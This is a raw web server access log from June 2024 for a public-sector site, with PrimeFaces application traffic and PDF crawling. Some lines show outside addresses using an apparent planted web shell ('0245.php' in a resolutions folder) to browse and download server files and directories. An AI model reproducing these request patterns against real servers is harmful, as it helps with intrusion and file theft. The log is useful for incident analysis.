186.154.121.126 - - [16/Jun/2024:15:09:15 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:09:15 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:09:15 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:09:15 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:09:15 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:09:15 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:09:15 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:09:15 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
201.245.192.253 - - [16/Jun/2024:15:09:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [16/Jun/2024:15:09:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1862.pdf HTTP/1.1" 200 428713
186.154.121.126 - - [16/Jun/2024:15:09:35 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 171369
216.244.66.195 - - [16/Jun/2024:15:09:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2153.pdf HTTP/1.1" 200 1691904
47.128.59.46 - - [16/Jun/2024:15:09:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5Cdmz%5C&f=xampp_start.exe&ft=notepad HTTP/1.1" 200 118784
216.244.66.195 - - [16/Jun/2024:15:10:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2258.pdf HTTP/1.1" 200 304288
201.245.192.253 - - [16/Jun/2024:15:10:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
161.18.222.72 - - [16/Jun/2024:15:10:24 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 5816
47.128.123.79 - - [16/Jun/2024:15:10:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cimpresion%5Cimages%5C&f=page67.swf&ft=img&white=1 HTTP/1.1" 200 30864
216.244.66.195 - - [16/Jun/2024:15:10:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2413.pdf HTTP/1.1" 200 304271
161.18.222.72 - - [16/Jun/2024:15:10:40 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 120315
161.18.222.72 - - [16/Jun/2024:15:10:41 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:10:41 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:10:41 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:10:41 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:10:41 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
161.18.222.72 - - [16/Jun/2024:15:10:46 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 163920
216.244.66.195 - - [16/Jun/2024:15:10:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2820.pdf HTTP/1.1" 200 279403
172.22.2.4 - - [16/Jun/2024:15:09:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
161.18.222.72 - - [16/Jun/2024:15:11:09 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 41405
161.18.222.72 - - [16/Jun/2024:15:11:09 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:11:09 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:11:09 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:11:09 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [16/Jun/2024:15:11:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
216.244.66.195 - - [16/Jun/2024:15:11:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/3059.pdf HTTP/1.1" 200 275592
47.128.25.103 - - [16/Jun/2024:15:11:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cmetalmecanica%5Cimages&f=page48.swf&ft=download HTTP/1.1" 200 14467
161.18.222.72 - - [16/Jun/2024:15:11:19 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 200 5331
201.245.192.253 - - [16/Jun/2024:15:11:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [16/Jun/2024:15:11:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/3272.pdf HTTP/1.1" 200 347395
161.18.222.72 - - [16/Jun/2024:15:11:38 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 200 5415
216.244.66.195 - - [16/Jun/2024:15:11:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/3344.pdf HTTP/1.1" 200 276810
172.22.2.4 - - [16/Jun/2024:15:10:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
47.128.117.157 - - [16/Jun/2024:15:12:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cbogotacumbredelclima%5Cwp-admin%5C&f=profile.php&ft=img&white=1 HTTP/1.1" 200 296
216.244.66.195 - - [16/Jun/2024:15:12:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/3687.pdf HTTP/1.1" 200 3051986
201.245.192.253 - - [16/Jun/2024:15:12:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [16/Jun/2024:15:12:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/3755.pdf HTTP/1.1" 200 2685796
216.244.66.195 - - [16/Jun/2024:15:13:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0017.pdf HTTP/1.1" 200 576273
